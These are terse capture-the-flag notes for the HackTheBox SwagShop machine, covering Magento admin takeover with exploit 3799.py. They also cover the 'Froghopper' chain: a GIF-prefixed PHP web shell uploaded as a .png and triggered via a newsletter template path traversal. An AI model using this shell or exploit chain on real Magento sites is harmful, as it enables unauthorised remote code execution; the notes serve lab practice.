Manegto

magetoscan

default admin path

/index.php/admin

No default credentials for Magneto

searchsploit magneto

locate 3799.py

python2 3799.py swagshop.htb

login with ypwq : 123

Froghopper

System > Configuration > developer > Template Settings > Allow Symlinks

1. Create new category

2. upload exec.php.png

GIF98
<?php echo exec($_GET['command']); ?>

1. Newsletter > Add New Template > preview

{{block type='core/template' template='../../../../../../media/catalog/category/exec.php.png'}}

References :

https://www.hackingarticles.in/swagshop-hackthebox-walkthrough/

https://bigb0ss.medium.com/htb-swagshop-write-up-50a560aa7a56